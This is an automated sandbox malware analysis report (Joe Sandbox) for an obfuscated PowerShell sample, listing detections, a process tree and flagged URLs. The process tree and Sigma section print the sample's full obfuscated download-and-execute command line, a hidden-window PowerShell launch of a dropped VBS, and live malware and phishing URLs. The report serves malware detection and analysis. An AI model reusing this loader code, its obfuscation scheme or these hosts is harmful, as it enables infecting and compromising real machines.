Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mj.ps1

Overview

General Information

Sample name:mj.ps1
Analysis ID:1569000
MD5:60d7208fe8e8ac62c560b76fcf8a3bce
SHA1:50220e1eed46cd7cce80a8f1e4aaf38619a6f2c7
SHA256:42306fd8ea8eea5b9eddb11782f5eb51d69eebfd63da36f2b03d749e649e3939
Tags:Listofrequireditemsps1user-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Loading BitLocker PowerShell Module
Obfuscated command line found
Powershell creates an autostart link
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Scan Loop Network
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7700 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mj.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8124 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f170vy.vbs'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • wscript.exe (PID: 6768 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\p2q.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • powershell.exe (PID: 832 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeUdmaa) exp, ');sanktionjtr (gaardspladsens 'Nouve$FrankgA.romlE,ponoThirdbVar,eaC eckl Angi:FurfuPFolliaBj.rgr BrneaSy pllMgli a ugerlD,nceiNonteaClosk=.epid$SkovgU DyslnGasliyMelaetsnesetDubbaiT,dtag Ov.rsIm.untAgrar. RejosP cnopKnaldlUdstriEnalitusik,( Comb$AfblnDA.iseePer,gaquiltkBountt.arnaighanevIntuieFremfr Impie Hu.gnUheldd LufteAto a) Sile ');sanktionjtr (gaardspladsens 'Ty,hl[Re.roNGa.teeAnskutNedsa.LilleS Forde Ind rMechovHistriBronzcUdvinejalo,PQualio wi niT ksan Tr.mtTra.iMToldva U.henDe phaSpansgHybrieDecarrBottl]Inder:Mi.un:UntraSst vse B,gvcInd auGietirLselyikva,ttLout.yTamanPArgierFjo.toAnmartIntero LigncUnsweo He slFgte Sigh.=Profe Sexga[R.klaNGged eBuddhtCyclo. SpheSsto.leRetaxcBijouuMessirRugnii,lidft KalvyKo mePPligtrHurraoChar tPaintoH.drac SelmoAur.clpulicTBa.isyRetropSkulle Be r]Multi:im.fs:Lsel Tta celmobilsNodia1 ejs2Chart ');$Unyttigst=$Paralalia[0];$Sportshelt= (gaardspladsens 'Urinv$ ,onog Di,ul.osanoNondibvrts,aDaughlOrtho:Ek alHGoa taHirude m.ldmFraukoUnintpContar inteotomogtDereieArbeju UdensLeu.o5Una.a3Snown=scopiNLiskae Undewbalda- .limOIntimbH enejF,ktoeJack.c Ps ctSpini Lab,SFa.veyLodsns.peletSaurueFejl.mKr kk.Scal NB.screHoftetFlers.Prin,WLiti,e uwarbv,ndiCUpbuilUnsigiBel ne Causn akset');$Sportshelt+=$Udsmeltningen[1];sanktionjtr ($Sportshelt);sanktionjtr (gaardspladsens ' alvf$P.risHLaerea,raineEskadm Foreoco,iop FortrNynazo Misdt Hexye PhotuKahausFl.ve5Ne.ro3dixli.SabbaH sveseF,revaLiljedIndspe P adrFuglesPreim[Gsac $Mas.iFSkovta Paasn PoolgAntifsK,pittTili,k Panin,iheni MetavLqwbee Gir,nTri.isExend]Overa= Fisk$EretrFSkviso Fla rEnsemlElaf nConteg SkrueAirstl ErfasTypeaeUnderr O.hasPlayb ');$Frstepladserne=gaardspladsens 'Upres$trideHRe veaPhysieStannmMinstoNondupIlma rmuseto Damptpr.geeImidouBommesHuman5No,ex3Uaktu. CyniDInklioTranswSigisnSm.rtlBeclooSemica Vindd Uno.FUp,igi Bilil KataeP,ash(Til a$SpdbrURestin,enziyAst ot rndstlkkeriKalkbgUncoms D.satA,lur, Selv$ArbitSStrafv .jereLuskejPochosCawineAuspirTypehePs.ud)Mm.rl ';$Svejsere=$Udsmeltningen[0];sanktionjtr (gaardspladsens 'Stand$,ytotgVarkal Tr,aoBoxlibCebriaBehanlMobil:wormsRAmm,nePunits Isdee Heiim Ste,bM.cerlGrentaAcetab askl FiceeCo.on=Recon(hofmaT,ndreeStu fsElekttpickp- ButtPUnempaFunktt Adr hdegra B nkr$Barn.STt.ekvThyroeCout.j SarasTibbie S ndrUdsp.ePrimu)Vasif ');while (!$Resemblable) {sanktionjtr (gaardspladsens 'Mango$ IliogArb jlCombpo Gipsbfi keaB,litl and:BacciU InornMazareUfat lDramaa Ulf.bDampso tormrAktena Acidt Bokoe S.nslMalocyvelli=Fa gl$BlacktPennyr Brumu.akfjeH pog ') ;sanktionjtr $Frstepladserne;sanktionjtr (gaardspladsens ' Ga,eSAnoretSmasha,ildvr,oncetForci-StillSLinjelformue Moboe Skrap Skif aller4Nicke ');sanktionjtr (gaardspladsens ' Grap$Falkegm,ctulAppelo AnlgbForstaTory,l Tine:ElectR Slideamatrs Dre e SvavmDelinblivsrlSatyraThomibUdskilCocree wird=adapi(ReamuTKseb.eUnives A,detGhett-GhettP OrgaaPa.hytWasseh Amat .eolp$veterSIndvivAm,uleTra.sjM sstsDuffieO nirr rgfoe Forb)Outa. ') ;sanktionjtr (gaardspladsens 'Lgter$IndopgAimlelro tio CorcbOuts.aT.glvlArrhy:PulchVOlie,eHomeonFre.sufo,gasA cohhIntera.upidaMonarrMaske= Uhde$GriflgSvinal,eekeo FilmbOchera D.lelagfas: epokKMa mil Loudoallots emoneArriltSkidtt handeUfordrVulgan UnrueTakhas Coff+Newfa+qu,ry%Spise$KitteP AfplaAstigrEarboaPersplFa ilaExsanl Srvei U staPorta.TangecCompoo Mlkeu,olban overt Blod ') ;$Unyttigst=$Paralalia[$Venushaar];}$Relationsnavne=334162;$Fraflytter=29582;sanktionjtr (gaardspladsens 'Falu $ crosgSerielUnfenoRefrib ElspaMelanlFrame:P,votNGonotoAnsjons ptldDiseqiC pyrsS.lfus riftiSc,urpTekstaSlikmt Aa,eeLykkedRubrilAf,ejytrilr besky=Spiru .etskG SynseMaskit Subs-materCHustao.defonAnsvatMil.beSkuern B.rgtAppea Ploug$SemaeSSuspevM dlaePassejSprins Rac,ePlonkrAdmiteSound ');sanktionjtr (gaardspladsens 'Inapp$Marsigblon lAr,tho SkolbBedstaOp uslCoccy:OvergSSkorzuFireap GlazeOpmunrDal,ts Wiene .nrec No.crFl.mme rudttOmk aiP,admo OvarnScree Udvi=St,an V st[amen SStammyGenres KvabtAmo,peS.rafmSmitt.Un,ipCRespioFi,tnnPr grv Poc eG,naerSamdetcoope]hinde:Kompr:KrykhFGlendrPolyeoB.tonmVed,rBGersoaAnacas StineNon.e6 Tidl4RivalS isket.atchr bsiti rikenaltrigGenae(Co.ka$IncitNMisimothu,nnHaanddH.vegiUnr.vsSandbsWomaniKosyspProteaMaskit re.reVal,dd HulklHo,edyFet,r)Svov. ');sanktionjtr (gaardspladsens 'Ka.kv$Ko,plg ,adelLimi.oCa cibUgenna UmenlLithi: BourAMetacrSekune Gurso Ha,dg Sup rD.staaSubsipOp.rvhpik,me oldorkonom Monst=Garni Scabr[D bleSUdtynyTapiosA.hudtBekose.edemmMarti.DibleTNeur,e S,gexSubautmorp .SkrifEDe epn SkadcMicrooPar gdF,gseiProdunBlomsgRecom]Milor:Ypsil:AngloANo.anSexarcCDriftI Ey pICadis.UnmilG acaneGuldstMurexSm rgitEft rrUdatei An inAttaigIsole(Uds.r$InterSIndisu.rtmapU,chaeTriazrTlpersFrstee Laerc oplr ObpyeNegrotUnc,nixenoloPlintnNonid)W nds ');sanktionjtr (gaardspladsens 'Bedre$Shan g misbl ingeoVestubKoorda Pettl.bebo: Nystn Quira ntipcikorh HalltB,conh MelaeProvenBoff.iRea dcAgate=deskt$ Kil,A EfterHool.e MechoAr ejgChastrHylstaUnnotpTurrihForudeA,rsdrNatur. SlhusBoissuou,lib,ventsDo.umtUnebrrGledeiFldstnHortegSvige(Lgdom$FodboRCam teForlol AnveaFoldetA.onyiCon,eoCo panTvrersPolitnSkspoa Th,uvRelegn Smele To k,Phase$EjendF kl,arServiaAllitf AfmulTyre.yAntiotOcta.tHonnreDigenrKaard)Petro ');sanktionjtr $naphthenic;" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7588 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7700JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 832JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Other

      SourceRuleDescriptionAuthorStrings
      amsi64_7700.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        amsi64_832.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Potentially Suspicious PowerShell Child Processes
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\p2q.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\p2q.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mj.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7700, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\p2q.vbs" , ProcessId: 6768, ProcessName: wscript.exe
          Sigma detected: Script Interpreter Execution From Suspicious Folder
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\p2q.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\p2q.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mj.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7700, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\p2q.vbs" , ProcessId: 6768, ProcessName: wscript.exe
          Sigma detected: Suspicious PowerShell Parameter Substring
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f170vy.vbs'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f170vy.vbs'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mj.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7700, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f170vy.vbs'", ProcessId: 8124, ProcessName: powershell.exe
          Sigma detected: WScript or CScript Dropper
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\p2q.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\p2q.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mj.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7700, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\p2q.vbs" , ProcessId: 6768, ProcessName: wscript.exe
          Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
          Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7700, TargetFilename: C:\Users\Public\p2q.vbs
          Sigma detected: Change PowerShell Policies to an Insecure Level
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mj.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mj.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mj.ps1", ProcessId: 7700, ProcessName: powershell.exe
          Sigma detected: Potential Binary Or Script Dropper Via PowerShell
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7700, TargetFilename: C:\Users\Public\p2q.vbs
          Sigma detected: Suspicious Scan Loop Network
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeUdmaa) exp, ');sanktionjtr (gaardspladsens 'Nouve$Fra
          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\p2q.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\p2q.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mj.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7700, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\p2q.vbs" , ProcessId: 6768, ProcessName: wscript.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mj.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mj.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mj.ps1", ProcessId: 7700, ProcessName: powershell.exe

          Suricata Signatures

          No Suricata rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: mj.ps1Avira: detected
          Antivirus detection for URL or domain
          Source: https://www.erp-royal-crown.info/wh/SubordinerendeAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SubordinerenAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SubordinerendAvira URL Cloud: Label: phishing
          Source: http://www.erp-royal-crown.infoAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SubordineAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.infoAvira URL Cloud: Label: phishing
          Source: https://www.pineappletech.ae/na/mg.vbsAvira URL Cloud: Label: malware
          Source: https://www.erp-royal-crown.info/wh/Avira URL Cloud: Label: phishing
          Source: https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdfAvira URL Cloud: Label: malware
          Source: https://www.erp-royal-crown.info/wh/SubordAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordinerendes78.smiAvira URL Cloud: Label: malware
          Source: https://www.almrwad.com/wh/Subordinerendes78.smiAvira URL Cloud: Label: malware
          Source: https://www.erp-royal-crown.info/wh/SubordinereAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/whAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SubordiAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SuborAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SuboAvira URL Cloud: Label: phishing
          Source: http://erp-royal-crown.infoAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SubordinerendesAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordinerendes78.sAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SubordinAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordinerendes78Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordinerendes7Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SubAvira URL Cloud: Label: phishing
          Multi AV Scanner detection for submitted file
          Source: mj.ps1ReversingLabs: Detection: 31%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.7% probability
          Source: unknownHTTPS traffic detected: 93.95.216.175:443 -> 192.168.2.11:49728 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 91.193.42.13:443 -> 192.168.2.11:49734 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.171.244.231:443 -> 192.168.2.11:49748 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 148.251.114.233:443 -> 192.168.2.11:49777 version: TLS 1.2
          Source: Binary string: mscorlib.pdb source: powershell.exe, 00000001.00000002.1512989035.000002CDAA82B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1401973851.000001D46676B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Un.pdb[(r source: powershell.exe, 00000004.00000002.1400620214.000001D466690000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: pdblib.pdb source: powershell.exe, 00000001.00000002.1582637126.000002CDC2CFB000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: bpdbtem.pdb source: powershell.exe, 00000001.00000002.1512989035.000002CDAA800000.00000004.00000020.00020000.00000000.sdmp
